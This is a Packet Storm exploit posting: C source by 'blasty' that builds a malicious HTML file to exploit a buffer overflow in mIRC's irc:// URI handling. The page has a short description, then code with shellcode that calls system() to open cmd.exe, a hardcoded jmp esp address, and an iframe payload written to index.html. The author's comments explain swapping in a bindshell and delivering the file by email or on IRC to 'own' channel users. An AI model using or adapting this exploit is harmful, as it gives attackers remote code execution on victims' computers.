mIRC v6.1 and below remote exploit which takes advantage of the bug described in mirc61.txt. Creates a HTML file which overflows the irc:// URI handling, spawning a local cmd.exe window. The exploit works even if mIRC is not started - The HTML can be in a HTML email or on a web page. Tested against Windows XP build 2600.xpclient.010817-1148.
4cd0bf42beaab24a9681b6932162eb72775c3439db6704c72c2c8e2f9991b043/** gEEk-fuck-khaled.c -- remote mirc < 6.11 exploit by blasty
**
** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148
**
** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
** nobody had written an exploit yet. So I decided to start writing one.
** Since this was my first time coding a exploit for windows, it took some
** research before I got the hang of it. (Ollydbg is much more confusing then GDB btw :P)
**
** This exploits (ab)uses the bug in irc:// URI handling. It contains a buffer-
** overflow, and when more then 998 bytes are given EIP will be overwritten.
**
** At first I was thinking of a simple solution to get this exploitable. Since
** giving an URI with > 998 chars to someone on IRC is simply NOT done :)
** Then I remember the iframe-irc:// flaw found by uuuppzz [2]
**
** This exploit will write an malicious HTML file containing an iframe executing the
** irc:// address. So you can give this to anyone on IRC for example ;)
** The shellcode included does only execute cmd.exe, because I don't want to be this
** a scriptkiddy util. But, replacing the shellcode with your own is also possible.
** An 400 bytes shellcode (bindshell etc.) easily fits in the buffer, but it may require
** some tweaking.
** After exiting the cmd.exe mIRC will crash, so shellcode its not 100% clean, but who carez :)
**
** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
** mIRC will start automatically when an irc:// is executed, so you can also send somebody
** and HTML email containing the evil HTML code. (only for poor clients like Outlook Express :P)
**
** Anyway, have fun with it, and dont own complete newb #chans :P
**
** Greetz to:
** inz, demz, gEEkz team
**
** [1] http://www.packetstormsecurity.nl/0310-advisories/mirc61.txt
** [2] http://www.uuuppz.com/research/adv-001-mirc.htm
**
** -- blasty (blasty@geekz.nl / www.geekz.nl)
**/
#include <stdio.h>
/* Stupid cmd.exe exec shellcode. hey! I r !evil ;) */
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()
char jmpback[] =
"\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode :)
char buffer[1100], fstring[1300]; // heh, need to clean this up
int main(int argc, char *argv[]) {
FILE *evil;
fprintf(stdout, "---------------------------------------------\n"
"mIRC < 6.11 remote exploit by blasty@geekz.nl\n"
"---------------------------------------------\n\n");
// NOPslides are cool
memset(buffer, 0x90, sizeof(buffer) - 1);
// place shellcode in buffer
memcpy(buffer + 20, shellcode, strlen(shellcode));
// took this one from ntdll.dll (jmp esp)
*(long *)&buffer[994] = 0x77F4801C;
// place jmpback shellcode in buffer
memcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));
printf("[+] Evil buffer constructed\n");
// open HTML file for writing
if((evil = fopen("index.html", "a+")) != NULL) {
// construct evil string :)
sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);
// write string to file
fputs(fstring, evil);
// close file
fclose(evil);
printf("[+] Evil HTML file written!\n");
return(0);
} else {
// uh oh.. :/
fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
exit(1);
}
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed